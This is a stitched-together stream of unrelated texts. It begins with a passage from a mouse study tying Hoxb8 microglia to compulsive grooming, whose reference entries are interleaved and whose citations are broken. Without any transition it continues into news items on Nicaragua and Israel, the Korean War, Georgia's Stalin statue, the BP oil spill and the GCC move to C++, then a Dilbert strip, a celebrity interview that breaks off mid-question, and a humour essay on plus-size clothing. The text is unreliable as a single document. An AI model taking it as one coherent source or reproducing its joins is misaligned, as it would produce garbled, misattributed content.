In support of this hypothesis we have shown that the only detectable Hoxb8 - labeled cell lineage in the brain ( the source of the complex , innate behavioral grooming syntax ) is microglia .
Second , disruption of Hoxb8 function results in the reduction of the total number of microglia in adult mouse brains ( i.e. , a microglia phenotype ) .
Further , the excessive pathological grooming behavior in Hoxb8 mutant mice can be rescued by transplantation with normal bone marrow .
Finally , restricted deletion of Hoxb8 in the hematopoietic system ( Tie2 Cre ) recapitulates the excessive pathological grooming behavior in these mice , while restricted disruption of Hoxb8 in the spinal cord ( Hoxc8 - ICre ) does not .
Alliot et al. , 1999 Alliot F .
Godin I .
Pessac B. Microglia derive from progenitors , originating from the yolk sac , and which proliferate in the brain .
Kaur et al. , 2001 Kaur C .
Hao A.J .
Wu C.H .
Ling E.A. Origin of microglia .
Ransohoff and Perry , 2009 Ransohoff R.M .
Perry V.H. Microglial physiology : unique stimuli , specialized responses .
There appear to be two principle sources of microglia in the mouse , a resident population that is present in the brain early during embryogenesis prior to vascularization ( ) and a second population of bone marrow origin , derived from circulating monocytes , that migrate into the brain through the vascular system shortly after birth ( ) .
The kinetics of infiltration of Hoxb8 - labeled microglia into the brain is consistent with this population being the bone marrow - derived subpopulation .
As such , the Hoxb8 lineage provides a useful molecular marker for distinguishing between these two microglial subpopulations .
Do they have similar or different roles in the brain ?
Molecular markers allow genetic interrogation of the system .
What would be the consequences of selectively ablating only one population ?
Interestingly , although Hoxb8 - labeled microglia represent only 40 % of the total microglial population present within the adult brain , selective inactivation of Hoxb8 in this subpopulation is sufficient to induce the pathological grooming behavior .
This fact would favor the hypothesis that the two microglial subpopulations present in the brain are performing distinguishable roles .
Frade and Barde , 1998 Frade J.M .
Barde Y.A. Microglia - derived nerve growth factor causes cell death in the developing retina .
Marin - Teva et al. , 2004 Marin- Teva J.L .
Dusart I .
Colin C .
Gervais A .
van Rooijen N .
Mallat M. Microglia promote the death of developing Purkinje cells .
Wake et al. ( 2009 ) Wake H .
Moorhouse A.J .
Jinno S .
Kohsaka S .
Nabekura J. Resting microglia directly monitor the functional state of synapses in vivo and determine the fate of ischemic terminals .
Microglia could affect neuronal activity and behavior by a number of mechanisms , including the secretion of cytokines that stimulate or inhibit neuronal activity , and work in parallel with neurotransmitters .
Microglia have also been reported to function in regulating neuronal cell death during embryogenesis ( ) .
Absence of appropriate cell death during neurogenesis could manifest itself later as aberrant behavior .
Finally , the experiments ofillustrating that microglia processes are very dynamic and engage in intimate contacts with synapses are particularly intriguing .
They observed that the duration of contact at synapses is dependent on neuronal activity .
From the above , it is becoming apparent that due to their mobility and dynamic contacts with synapses , microglia could represent an additional system for stabilizing and managing neural networks .
By virtue of their high abundance in the cortex , including the frontal orbital regions and basal ganglia , the microglia of Hoxb8 lineage are positioned in close proximity to the pathways controlling repetitive behavior .
Graybiel and Rauch , 2000 Graybiel A.M.
Rauch S.L. Toward a neurobiology of obsessive - compulsive disorder .
Huey et al. , 2008 Huey E.D .
Zahn R .
Krueger F .
Moll J .
Kapogiannis D .
Wassermann E.M .
Grafman J. A psychological and neuroanatomical model of obsessive - compulsive disorder .
Berridge , 1989 Berridge K.C. Progressive degradation of serial grooming chains by descending decerebration .
Berridge and Whishaw , 1992 Berridge K.C .
Whishaw I.Q. Cortex , striatum and cerebellum : control of serial order in a grooming sequence .
Taylor et al. , 2010 Taylor J.L .
Rajbhandari A.K .
Berridge K.C.
Aldridge J.W. Dopamine receptor modulation of repetitive grooming actions in the rat : potential relevance for Tourette syndrome .
Welch et al. ( 2007 ) Welch J.M .
Lu J .
Rodriguiz R.M .
Trotta N.C .
Peca J .
Ding J.D .
Feliciano C.
Chen M .
Adams J.P .
Luo J .
et al .
Cortico - striatal synaptic defects and OCD - like behaviours in Sapap3 - mutant mice .
OCD in human patients is associated with three principal brain regions : the prefrontal cortex , particularly the orbitofrontal cortex and anterior cingulated cortex ; basal ganglia , including dorsal striatum and globus pallidus ; and thalamus , namely , the dorsal medial nucleus ( ) .
Excessive grooming in rodents is widely believed to mimic the key traits of OCDs .
Although the syntactic grooming chain can be fully executed in rats decerebrated at various mesencephalic levels , indicating that neural circuits specifying the basic sequential structure are all present within the brainstem ( ) , cortex and striatum play important roles in modulating the initiation and completion of grooming bouts ( ) .
Dopamine is a prominent neurotransmitter for implementation of the grooming pattern ( ) .
However , have reported OCD - like behaviors in Sapap3 mutant mice that have reduced synaptic transmission in glutamanergic corticostriatal circuits , and they further showed that the compulsive grooming in these mutants is alleviated with serotonin reuptake blockers .
Thus , it is apparent that multiple brain regions and signaling pathways control the frequency of repetitive behaviors .
Holstege et al. , 2008 Holstege J.C .
de Graaff W .
Hossaini M .
Cano S.C .
Jaarsma D .
van den Akker E .
Deschamps J. Loss of Hoxb8 alters spinal dorsal laminae and sensory responses in mice .
An alternative hypothesis has been put forward that the pathological grooming observed in Hoxb8 mutant mice is due to the sensory defects resulting from impaired formation of the spinal cord ( ) .
However , all of the experiments that we have presented contradict this hypothesis and have instead identified a defect in the hematopoietic system and more specifically a deficiency in microglia as likely causative for the aberrant grooming behavior .
Our experiments have clearly separated the pathological grooming behavior from the sensory spinal cord defects to distinct cellular compartments .
However , our experiments do not rule out the possibility that at later stages of the pathology the spinal sensory defects could exacerbate the consequences of excessive grooming .
Some of the apparent differences in the interpretation of Hoxb8 mutant phenotype by the Deschamps and our laboratories may result from monitoring different behavioral features .
We monitor the time spent grooming ( on Laboras platforms ) , whereby excesses in Hoxb8 mutant mice leads to pathological behavior and very broad hair removal and skin lesion patterns .
Grooming can be distinguished from scratching by the Laboras platforms .
We did not observe increased scratching in our Hoxb8 mutant mice except modest increases at the very late stages of the pathology when lesions become apparent and the animals would normally be euthanized .
The Deschamps laboratory reports very localized hair removal and skin lesions that appear more consistent with a response to a localized chronic itch .
What accounts for the differences in phenotypic outcomes between the two Hoxb8 mutant mice ?
Differences in genetic backgrounds is not likely to be a strong contributor since both lines have been crossed to a predominantly C57Bl / 6J background .
Mainguy et al. , 2007 Mainguy G .
Koster J .
Woltering J.
Jansen H .
Durston A. Extensive polycistronism and antisense transcription in the Mammalian Hox clusters .
Greer and Capecchi , 2002 Greer J.M.
Capecchi M.R. Hoxb8 is required for normal grooming behavior in mice .
Holstege et al. ( 2008 ) Holstege J.C .
de Graaff W .
Hossaini M .
Cano S.C .
Jaarsma D .
van den Akker E .
Deschamps J. Loss of Hoxb8 alters spinal dorsal laminae and sensory responses in mice .
Notably , the Hoxb8 mutant alleles are different .
This is a concern because the density of genes is very high within the Hox complex , and there are many noncoding RNA transcripts as well as protein - encoding transcripts transcribed within this complex ( ) .
The Deschamps allele is a LacZ knockin into the first exon of Hoxb8 .
Our allele was generated by introduction of a nonsense codon in the first exon and a loxP site into the second .
Both inserts are small relative to the LacZ insert .
We have shown that a knockin allele of neor into the Hoxb8 locus shows additional phenotypes due to perturbation of neighboring Hox gene expression , which disappear upon removal of the neor gene ( ) .
Similarly , the LacZ gene could perturb neighboring RNA and / or protein expression and thereby alter phenotypes .
Consistent with this interpretation , in mice homozygous for a knockin allele of CreERTM inserted into the first exon of Hoxb8 ( Figure S1 E ) , we have observed the localized hair removal and skin lesion phenotype described byin their Hoxb8 mutant ( Figure S4 D ) .
This new phenotype shows up at a low penetrance ( ∼10 % ) in addition to our characteristic Hoxb8 mutant grooming phenotype .
We have demonstrated that a deficiency in hematopoiesis of Hoxb8 mutant mice is causal to the pathological grooming deficit observed in these mutant animals .
This deficit is correctable by normal bone marrow transplants .
We have argued that the grooming malbehavior is primarily manifested by a deficit in microglia derived from bone marrow .
However , a deficiency in T and / or B cells may also contribute to the severity of the behavioral pathology .
Also , we have not ruled out other cellular members of the hematopoietic system as potential contributors to Hoxb8 pathological grooming .
Why couple behavior such as grooming to the host 's immune system ?
From an evolutionary perspective it may make perfect sense to couple a behavior such as grooming , whose purpose is to reduce pathogen count with the cellular machinery , the innate and adaptive immune systems , used to eliminate pathogens .
In summary , we have provided strong support for the hypothesis that the excessive pathological grooming behavior exhibited by Hoxb8 mutant mice is caused by a defect in microglia .
That a behavioral deficit could be corrected by bone marrow transplantation is indeed surprising .
The therapeutic implications of our study on amelioration of neurological behavioral deficits in humans have not escaped us .
This mouse model provides an opportunity to determine how impaired microglia results in generating such a distinct compulsive behavioral anomaly .
Further , since the Hoxb8 lineage specifically marks the microglia subpopulation derived from bone marrow , this mouse can also be used to genetically interrogate this cell subpopulation relative to the resident microglial subpopulation .
MANAGUA , June 1 ( Xinhua ) --
The Nicaraguan government Tuesday suspended the country 's diplomatic ties with Israel in protest of the Jewish state 's deadly raid on the Gaza - bound international aid flotilla on Monday .
Government spokeswoman Rosario Murillo , who is wife of Nicaraguan President Daniel Ortega , announced the move in a short statement .
" Nicaragua suspends from today its diplomatic relations with the government of Israel , " said the statement .
The Nicaraguan government " emphasized the illegal nature of the attack on a humanitarian mission in clear violation of international and humanitarian law , " it added .
The Israeli navy backed with helicopters attacked early Monday morning the flotilla in the Mediterranean international waters with live ammunition and gas bombs , killing at least 10 people on board and injuring over 30 others .
The UN Security Council on Tuesday condemned the Israeli move , calling for " the immediate release " of the ships and personnel held by Israel .
Please turn on JavaScript .
Media requires JavaScript to play .
Star Trek legend Leonard Nimoy talks " pointy ears " and computer gaming with the BBC's Daniel Emery .
The actor , who played Spock , is at the E3 conference in Los Angeles to promote the game Yoostar 2 .
Image caption Bo-ok Park fled North Korea at the age of 22
As the two Koreas mark the outbreak of the 1950 - 1953 Korean War , Jae -youn Lee , a company intern in Seoul and Sogang University student , talks to her grandmother about what she experienced and the legacy of the conflict .
My maternal grandmother Bo-ok Park moved from the north to the south one year before the Korean War started .
My grandfather 's family was importing timber from Japan .
It was a big company and the family was very rich .
After the 38th parallel was chosen to separate the two countries , the Reds started killing rich people and taking their money .
So rich people had to flee to South Korea to save their lives .
My grandfather had a passport and he could cross the 38th parallel easily .
He escaped first .
My grandmother had to flee in secret .
She had a really tough journey .
She got captured by the North Korean army and kept in a detention centre for a month .
They fed her soup made of water , salt and grain .
The detention centre was a big hall .
There was a line on the floor separating the men from the women .
The space was too small and it was impossible for them to lie down .
So people slept as they were sitting .
After her release , she tried to go to South Korea again .
There was a guide who knew the way to South Korea over the mountains , river and sea .
She slept during the day , travelling at night until she reached the sea .
She then waited for the tide and crossed the sea on foot .
That is how she made it to South Korea .
Firing squad
One year later , the Korean War broke out .
She was living in Seoul , which fell to the North .
She had to hide the fact that she was from the North .
Every young man was forcibly conscripted to the North Korean army , including my grandfather .
But he dodged it : he did not eat for two weeks and got pneumonia .
War is not just our past , it is our nation 's old wound Jae-youn Lee
She remembered that one day the North Korean army asked a child on the street whether it knew anyone from the South Korean army .
The child pointed towards the house of a South Korean army surgeon .
All men from that house were executed by firing squad .
The dead bodies were piled up on the road towards the market .
They were left there for more than a month to create fear .
My grandmother 's father had died when she was at high school .
She was living together with her mother and her grandmother as well as brothers and a sister .
There were many people from the north trying to escape to the south .
If they got caught , they got killed .
So the family decided to move only one or two people at a time to lower the risk .
They started with the oldest brother to the youngest .
The last one to leave was my grandmother 's mother .
She had to stay last to be with her old mother .
But when she left , the border at the 38th parallel was closed , so she did not make it .
The wife , sons and daughters of one of her brothers also did not make it to the south .
' Want to go home '
My grandmother and her brothers have been trying to make contact with their family in the north since 1995 .
Finally , in 1997 , a message was received through a tourist who visited North Korea .
The message was from her brother 's son's daughter , Hwa-sun .
Image caption Bo-ok Park received this image of her mother from North Korea in 2005
Hwa - sun went as a tourist to North Korea 's border with China .
She had also been trying to contact her relatives in the South .
Those members of the family who remained in North Korea were banished to live in a mountain because their relatives escaped to the South .
Members of the family died of hunger in their exile .
My great - grandmother used to pray to God for the happiness of all the brothers in the South .
She told Hwa - sun : " You should go to South Korea , and achieve your dreams there . "
After getting Hwa - sun 's message , my grandmother 's brother tried to rescue her , and Hwa - sun finally entered South Korea in 2005 .
My grandmother told me that her life was full of pain and sorrow .
She endured much humiliation under Japanese rule .
After that she suffered the pain of the war .
After the war she had to work to support her family .
So she did not know the meaning of happiness before the age of 60 .
Almost everyone from her generation who has memories of the war still gnash their teeth in anger .
They were robbed of their money - and of their youth .
They were not the real communists , she says .
They were just Reds .
They killed the intellectuals , the real communists .
They did not care about equality , they cared only about their personal benefit .
She really hopes for unification .
She said with tears in her eyes : " If the two Koreas are reunified , I would want to go to my hometown where I grew up and where my parents are buried . "
Old wound
Nowadays , there are no real patriots in South Korea , she feels .
Both right and left are just fighting for their own benefit .
She said she prefers the hard - line approach towards the north because the " Sunshine [ Policy - of opening up the North through bilateral economic engagement ] " is only good for the North Korean leaders .
The long - suffering , starved people in the North make her heart break .
I talked a lot with my grandmother and we cried together .
I 've heard short episodes about her life and the war before .
But this was the first time I heard the whole story told with genuine sincerity .
There is a lack of understanding between the two generations - the older one who lived through the war and the younger one .
To tell the truth , my generation does not care about unification .
It is just a burden to be added to the high taxation .
War is not just our past .
It is our nation 's old wound .
Because of our older generation 's effort we lead a rich life .
North and South Korea share the same language and same history .
Our country was divided not by our own device , but by the struggle between the communist and capitalist powers .
So we have to achieve peaceful unification .
I prefer [ former President ] Kim Dae - jong 's way .
I think the Sunshine Policy can save life in the north and open the minds of the North Koreans .
After talking to my grandmother I understand why the elderly are always complaining and I have more empathy for our modern history .
And I will think better about our future .
Authorities in Georgia have taken down a statue of Soviet dictator Joseph Stalin that stood in the central square of Gori , his hometown .
The six - metre ( 20 ft ) bronze statue was removed unannounced from its plinth in the middle of the night .
The statue will be moved to a museum in Gori dedicated to Stalin , said the head of the city council , Zviad Khmaladze .
It will be replaced by a monument for the victims of Georgia 's 2008 war with Russia .
Gori was bombed by Russian forces during the brief conflict in August 2008 .
A journalist told Reuters news agency that police had tried to prevent reporters from filming the removal of the statue .
" A new monument dedicated to victims of the Russian aggression will be erected " in the central square , said Mr Khmaladze .
Subject of debate
The statue of Stalin had stood in central Gori since the early 1950s , and many of the town 's residents have remained proud of the former Soviet leader .
FAMOUS STATUES TOPPLED Chiang Kai-shek , Taiwan , 2007
General Franco , Madrid , 2005
King Leopold II of Belgium , Democratic Republic of Congo ( formerly Zaire ) , 1967 - re-erected in 2005 , but taken down again within days
Saddam Hussein , Baghdad , 2003
Soviet secret police founder Felix Dzerzhinsky , Moscow , 1991 Statues removed as times change
In pictures : Stalin taken down
It is thought to have been the sole large - scale statue of Stalin still standing in its original position in the former Soviet Union .
But there are several smaller busts on display , some unveiled as recently as May amid celebrations for the 65th anniversary of victory over Nazi Germany .
After Georgia gained independence in 1991 , crowds tore down statues of Stalin and Lenin across the country , but hundreds of people gathered in Gori and refused to let the statue there be touched .
Recently , the fate of the statue has been a subject of debate in Georgia , with supporters of the pro-Western " Rose Revolution " that brought President Mikheil Saakashvili to power in 2004 arguing for its removal .
Georgia 's Culture Minister Nika Rurua defended the authorities ' action on Friday , saying " I believe Stalin was a political criminal , who led the Russian Bolshevik army into Georgia in 1921 , which eventually carried out Georgia 's occupation " .
" Stalin was a man who created hideous autonomies based on ethnic division , which to this day continue to create great problems for Georgia 's freedom , democracy and consolidation .
Stalin was a man who simply destroyed the best parts of Georgia . "
Joseph Stalin was born to a modest family in Gori in 1879 .
Though he was not a decisive figure in the Bolshevik seizure of power in 1917 , he quickly rose through the ranks of the Communist Party after the revolution , securing his position as undisputed leader in the years after Lenin 's death in 1924 .
His forced collectivisation of agriculture cost millions of lives , while thousands were executed and millions sent into exile during purges in the 1930s .
Soviet authorities moved to dismantle the cult around Stalin in the period of " de - Stalinisation " that followed his death .
There are still many statues of Lenin across the former Soviet Union , as well as a mausoleum to the former leader in Moscow .
It is an odd stance , to be sure .
( If you really want to start repealing amendments , why not go after the Third Amendment , the one that outlaws the forcible quartering of soldiers in peacetime ?
Would anyone really mind letting a few cadets stay the night ? )
But the idea is worth a more serious examination , if only to try to understand the forces that would lead a group of politically engaged Americans to demand the curtailment of their own franchise .
For more than a century after the nation ’s founding , as part of the framers ’ compromise between Hamiltonian and Jeffersonian ideals , the power to appoint senators rested with state legislators , while the masses got to choose members of the House of Representatives .
In 1906 , the writer David Graham Phillips published a series of articles in Cosmopolitan  a New Yorker of its day  exposing corruption among senators who bought their seats from legislators and used them to get even richer .
( Mr. Phillips ’s main target was a Rhode Island senator named Nelson Aldrich , a rubber and sugar magnate whose ties to corporate interests make today ’s senators look like a fraternity of Buddhist monks . )
Mr. Phillips ’s work was n’t the sole driver of change , but like Upton Sinclair , whose “ Jungle ” was published almost simultaneously , his influence among progressives was significant .
As Nancy C. Unger , a biographer of the progressive titan Robert La Follette , explains it , the series spurred public outrage , and soon Mr. La Follette and other reformers had added the direct election of senators to a list of proposals that also included women ’s suffrage and workers ’ safety .
The 17th Amendment took effect in 1913 .
In recent years , repeal of the 17th Amendment has been advocated , sporadically and to little effect , by such conservatives as the columnist George Will , the presidential gadfly Alan Keyes and Zell Miller , the former Democratic senator from Georgia .
Their basic argument is that the amendment effectively eliminated the only real oversight that state legislatures had over Washington , which has in turn encouraged Washington to pile unfunded mandates onto the states .
In four weeks , The Times ' network of news sites will no longer allow search engines to index its articles .
Rupert Murdoch has long threatened to hide some of the news sites in his media empire from search engines such as Google .
It seems he 's finally ready to walk the walk .
The folks from PaidContent saw a preview of the two upcoming redesigns , and the future is indeed looking bleak for non-paying customers .
Visitors who are n't members will be greeted with a login screen and will be unable to view articles .
According to Assistant Editor of The Times Tom Whitwell , the reason you wo n't be able to search for articles is to strengthen the distinction between paying and non-paying customers .
“ The clarity is something that was very important .
If you ’re asking someone to pay for something , it has to be very clear what they ’re paying for , ” he said .
The question is : How will The Times attract new readers ?
The times ( no pun intended ) are changing , and search engines , links and mentions on social networks are the currency of attention .
Block them , and the attention will shift elsewhere .
Murdoch claims he'd rather have fewer customers coming to his sites if they are paying .
Soon enough , we 'll see if this " less is more " philosophy holds water .
Shanghaied The Flip Side of China 's Economic Miracle
German businessman Mohammad - Reza Mouazzen wanted to expand his heavy equipment company into China .
But it did n't take long before he realized that the country 's economic miracle has a dark underbelly .
View Transcript
Transcript
Dilbert says , " Rumor has it that you 're pretending to hear things wrong to avoid work . "
Wally says , " It works great .
The secret is to have no shame whatsoever . "
Coworker says , " Wally , do you have the revised budget estimate ? "
Wally says , " No , because you asked for a remized bugmet yestitet . "
Welcome to Zola !
You 're seeing this page because we could n't find a template to render .
To modify this page , create a section .
html file in the templates directory or install a theme .
You can find what variables are available in this template in the documentation .
Last night , Cafe Open was again the target of homophobic attacks -- the third time this week .
Twice , unknown parties threw Molotov cocktails at the cafe , which burned the exterior of the building .
Last night , the attackers spray - painted the building with homophobic slurs such as " Death to Faggots ! "
The same slogans were painted on the home of Judge Zalar , who presided over another case involving Cafe Open last year where a literary evening was interrupted by anti-gay attackers .
The Ministry of the Interior and the police have been informed of the situation and will provide a higher level of protection for events to be held during the week , including the Pride parade .
The police believe that the homophobic graffiti is related to the attacks on Cafe Open last year and that the Molotov cocktails were time to coincide with the start of LGBT Pride Week .
Forecast : Red Sox have a lot of back - end roster cuts to make over the next month
The Sox may need to cut 14 players from the 40 - man roster before the Rule 5 draft this winter .
So expect a lot of turnover .
As Bible - believing Christians , we are known for our convictions against sexual immorality .
But are we known equally as well for our contempt for religious arrogance ?
Scripture clearly states that sexual immorality is sin ( Matthew 15:19 ; Romans 13:13 ; 1 Corinthians 6:18 ; Galatians 5:19 , 1 Thessalonians 4:3 , etc. ) .
We must also remember , however , that this is only one bad fruit of our rebellion against God , one among a list of many others , including idolatry , theft , greed , drunkenness , reviling and swindling ( 1 Corinthians 6:9- 10 ) .
And all of these , God says , are just spin - offs of a more deep - seated trouble .
Speaking to a disobedient Israel , the prophet Ezekiel declares ,
Behold , this was the guilt of your sister Sodom : she and her daughters had pride , excess of food , and prosperous ease , but did not aid the poor and needy .
They were haughty and did an abomination before me .
So I removed them , when I saw it .
( Ezekiel 16:49 - 50 )
In the context surrounding this passage , Ezekiel is charging Israel for having done worse than Sodom .
And what does he say was Sodom ’s sin ?
The prophet does n’t focus on any single outward behavior .
Sexual immorality was an issue , as we know from Genesis , and so was her lack of concern for the poor and needy , as we see mentioned here .
But Ezekiel does n’t target either of those primarily .
Rather , he says that the real issue with Sodom was her haughty heart — she was proud .
There ’s a warning in this for us :
We must beware in our opposition to sexual immorality that we do not merely take on a different expression of the same sin .
We must beware lest we think that the issue is simply an external one and that we are “ good with God ” just because we maintain a high moral code .
Any outcry among Christians against sexual immorality should be outdone by our protests against pride .
We should be most aggressively opposed to arrogance — especially as we find it in ourselves and in our churches .
Only then will we be in a right position to speak humbly , wisely and brokenheartedly about the evils of sexual immorality and the greater love of Jesus Christ .
NSW left - hander Usman Khawaja and Tasmanian swingman Ben Hilfenhaus have been named in the Australian Test team to face Pakistan in two Tests in England .
Khawaja , 23 , born in Islamabad , Pakistan , arrived in Australia aged four and is believed to be the first Muslim to be selected to represent Australia .
Usman Khawaja playing for Australia A against Sri Lanka A in Brisbane last week .
Credit : Getty Images
When he was first selected for NSW in 2008 , cricket historian Kersi Meher - Homji said at the time he believed Khawaja was the first local Muslim to play at this level , although he was not the first to be born in the sub - continent .
Mark Lavender , a West Australian batsman of the 1990s was born in Chennai , India , while Dav Whatmore , born in Sri Lanka , played seven Tests for Australia .
Khawaja 's promotion arrives after a spot was opened up by a shoulder injury to Phil Hughes .
This is the mail archive of the gcc@gcc.gnu.org mailing list for the GCC project .
Using C++ in GCC is OK
From : Mark Mitchell < mark at codesourcery dot com >
To : GCC < gcc at gcc dot gnu dot org >
Date : Sun , 30 May 2010 17:26:16 -0700
Subject : Using C++ in GCC is OK
I am pleased to report that the GCC Steering Committee and the FSF have approved the use of C++ in GCC itself .
Of course , there 's no reason for us to use C++ features just because we can .
The goal is a better compiler for users , not a C++ code base for its own sake .
Before we start to actually use C++ , we need to determine a set of coding standards that will apply to use of C++ within GCC .
At first , I believe that we should keep the set of C++ features permitted small , in part so that GCC developers not familiar with C++ are not rapidly overwhelmed by a major change in the implementation language for the compiler itself .
We can always use more of C++ later if it seems appropriate to do so , then .
For example , I think it goes without question that at this point we are limiting ourselves to C++98 ( plus " long long " so that we have a 64 - bit integer type ) ; C++0 x features should not be used .
Using multiple inheritance , templates ( other than when using the C++ standard library , e.g. std::list <X > ) , or exceptions also seems overly aggressive to me .
We should use features that are relatively easy for C programmers to understand and relatively hard for new C++ programmers to misuse .
( For example , I think constructors and destructors are pretty easy and hard to misuse . )
Because C++ is a big language , I think we should try to enumerate what is OK , rather than what is not OK .
But , at the same time , I do n't think we should try to get overly legalistic about exactly what is in and what is out .
We need information guidelines , not an ISO standard .
Is there anyone who would like to volunteer to develop the C++ coding standards ?
I think that this could be done as a Wiki page .
( If nobody volunteers , I will volunteer myself . )
Whoever ends up doing this , I would urge the rest of us not to spend too much time in the C++ coding - standards bikeshed ; we 're not going to win or lose too much because we do or do not permit default parameters .
-- Mark Mitchell CodeSourcery mark@codesourcery.com ( 650 ) 331-3385 x713
Major oil firms drilling off the US coastline are as unprepared as BP for a large - scale spill , the head of a Congressional panel has said .
Edward Markey told the House energy and commerce sub-committee Exxon - Mobil , Chevron , ConocoPhillips and Shell all have identical response plans to BP .
BP 's US chief Lamar McKay and four other oil bosses gave evidence amid accusations BP took shortcuts .
President Barack Obama is to make a TV address later from the White House .
He will use the prime - time speech , at 2000 ( 0000 GMT ) , to outline the next steps his administration will take against the spill .
Those are reported to include new steps to restore the Gulf Coast ecosystem and explicit demands to ensure BP fully compensates those affected .
This week , the BBC is assessing the impact of the Louisiana oil spill .
To see the scale of the new deep water drilling rigs in one of the world 's biggest and deepest off - shore fields , join BBC World News in Brazil on Tuesday with Paulo Cabral .
Full coverage of the oil disaster LIVE : Obama oil spill address
The speech will be delivered from the Oval Office , a setting reserved for the most sombre and important moments in US national life .
Speaking in Florida before returning to Washington at the end of a two - day trip to the affected region , he said the government would not abandon those affected .
" I am with you , my administration is with you for the long haul to make sure BP pays for the damage it has caused , " Mr Obama said .
Oil has been spewing into the Gulf of Mexico since a drilling rig leased by BP exploded on 20 April with the loss of 11 lives and sank two days later .
A cap placed by BP on the damaged oil well earlier this month is now said to be collecting about 15,000 barrels daily .
But US government and independent scientists now estimate that the most likely flow rate of oil is between 35,000 and 60,000 barrels per day - a sharp increase on the estimate of a week ago .
The operation suffered a setback on Tuesday when a lightning strike sparked a fire on board a vessel collecting oil , forcing BP to suspend operations temporarily .
Fitch Ratings , one of the three big credit rating agencies , has downgraded BP by six notches , from AA to BBB .
The move means Fitch is less confident of BP 's ability to repay its debts following the huge clean - up and legal costs the company is expected to rack up as a result of the spill .
Also on Tuesday , Mr Obama named Michael Bromwich as the new head of the federal agency in charge of oil and gas development , the White House .
' Nightmare well '
Opening the congressional hearing , Henry Waxman , joint chairman of the full House energy committee , took a tough line , declaring that the major oil firms were " no better prepared to deal with a major oil spill than BP " .
He called the five firms ' responses " cookie - cutter " plans and " paper exercises " , adding : " BP failed miserably when faced with a real leak and one has to wonder whether ... [ the others ] would do any better . "
MARDELL'S AMERICA
The president 's real problem is whether he has gripped this crisis hard enough from the start Read Mark 's thoughts in full
Echoing the words of former President George W Bush , Mr Waxman said the US was " addicted to oil " .
" This addiction is fouling our beaches , polluting our atmosphere and undermining our national security , " said Mr Waxman .
However , Texas lawmaker Michael Burgess , a Republican , accused Democrats of using the oil spill as a cover to propose climate change and energy legislation that would lead to over - regulation and higher taxes .
And the five oilmen called to give evidence - the bosses of Shell , Chevron , ExxonMobil and ConocoPhillips as well as BP America - all told the committee of their corporate commitment to safety .
" We do not proceed with operations if we cannot do so safely , " ExxonMobil boss Rex Tillerson said .
While the theme of Tuesday 's hearing is deepwater drilling in general , BP chief executive Tony Hayward will face a separate House hearing on Thursday devoted to the Deepwater Horizon disaster .
Mr Waxman and fellow committee member Bart Stupak sent Mr Hayward a letter on Sunday in which they set out technical questions they expect him to answer .
The letter quotes internal communications between BP engineers before the disaster in which the site is described as a " nightmare well " .
' Carelessness and complacency '
At issue were the choice for the design of the well , preparations for and tests of the cement job , and assurances that the well was properly sealed on the top .
Image caption
The drilling rig exploded and sank in the Gulf , causing 11 deaths
Among other things , BP apparently rejected advice of a sub-contractor , Halliburton , in preparing for a cementing job to close up the well .
BP rejected Halliburton 's recommendation to use 21 centralisers to make sure the casing ran down the centre of the well bore .
Instead , BP used six .
In an e-mail on 16 April , a BP official involved in the decisions explained : " It will take 10 hours to install them .
I do not like this . "
Later on the same day , another official recognised the risks of proceeding with insufficient centralisers but added : " Who cares , it 's done , end of story , will probably be fine . "
" It appears that BP repeatedly chose risky procedures in order to reduce costs and save time and made minimal efforts to contain the added risk , " the congressmen write .
" If this is what happened , BP 's carelessness and complacency have inflicted a heavy toll on the Gulf , its inhabitants , and the workers on the rig , " they say .
The BBC News website will provide live coverage of Barack Obama 's address , insights from BBC correspondents and reaction from around the web between 2300 and 0200 GMT ( 1900 to 2200 EST ) .
Marques Houston Talks Near - Death Experience With Brandy , Offers Halle Berry Dating Advice
VIBE speaks with the former frontman of IMx about anything but his upcoming album , Mattress Music
Interview by : Starrene Rhett
VIBE : Who is your industry best friend ?
Marques Houston : Omarion is too obvious because he ’s my brother .
But the closest person in the industry to me who is like a big brother is Tyrese .
He gives me a lot of good advice .
We both do the same things .
We ’re both from the same background .
He comes from Watts .
I ’m from South Central .
He also started as a musician turned actor , the same way I did and I like that fact that he ’s able to do both and be successful at it .
Being around him , I ’m able to soak up a lot of knowledge from him as far as movies go .
While we 're talking Hollywood , why ca n’t Halle Berry keep a man ?
Halle Berry can’t keep a man because she ’s probably very controlling and aggressive , and men do n’t like that .
I know from a lot of women friends that I have who are Leos .
They do n’t really have men because they ’re really really aggressive and controlling and men do n’t like that .
I do n’t know Halle Berry personally but I ’m guessing that she ’s one of those women that likes to be in control of the relationship and most men do n’t like that .
What ’s your perfect ice cream sundae ?
Vanilla mixed with strawberry swirl sauce on top and some fresh skrawberrys on top .
SKRAWBERRIES !
Know what I mean ? [ laughs ]
" He actually came out with a gun and had he not seen it was us , [ Brandy and I ] probably would have gotten shot ! "
What ’s the sneakiest thing you ’ve ever done ?
This is actually a really weird story .
Brandy Norwood and I always bring this up whenever we see each other — we say we almost died together .
It was our old office building and there was a guy who had a back office .
He was working real late one night and we scared him .
We kept sneaking around to the window and tapping on the back and he actually came out with a gun and had he not seen it was us , we probably would have gotten shot !
But that ’s one of the sneakiest or most mischievous things I ’ve done when I was young .
What personality traits did you have in common with Roger ?
None .
Absolutely zero .
Roger was the complete opposite of me .
I used to really tell people that that was my twin brother .
I was so different from him because Roger was a nerdy guy who could n’t get girls and he was goofy .
I was the complete opposite .
I was the ladies man in school .
I always had friends , people looked up to me .
When I was seven , my two best friends were 12 , they looked up to me , I was the leader so it was completely opposite .
Roger was totally a character .
Is the rumor that you took Beyonce ’s virginity true ?
I am a big fatty .
This is the one area where Internet criticism of me is correct .
Now , I am not exactly morbidly obese , but I am fat enough to worry about things that fat people worry about , like clothes .
The world has not wanted to see fat people naked since the Renaissance , so we are pretty much forced by our fascist society to wear something .
I can barely call them " clothes , " however , as much of what 's been available for the full - figured woman could better be defined as tents , or period costumes , or tablecloths with neck holes cut in the middle .
A sample of the hot fashions often available to the overweight .
Note how a muumuu can make even a skinny woman look fat .
You might think , Well , serves you right for being fat , fatty .
Lose some weight if you want to wear nice clothes .
Sure , Americans in particular should probably take some responsibility for their weight , but does it benefit any of us , fat or thin , to see that sweater or those floral prints coming down the street at us ?
Fortunately , this seems to have gotten through to many clothing designers in the last few years , who have started coughing up clothing lines for the specially - sized .
Unfortunately , this " victory " actually just opens up stage two of the " finding clothes even though you are overweight " game .
Stage two involves navigating the maze of stupid euphemisms to figure out where all these new plus - sized clothes are .
Continue Reading Below Advertisement
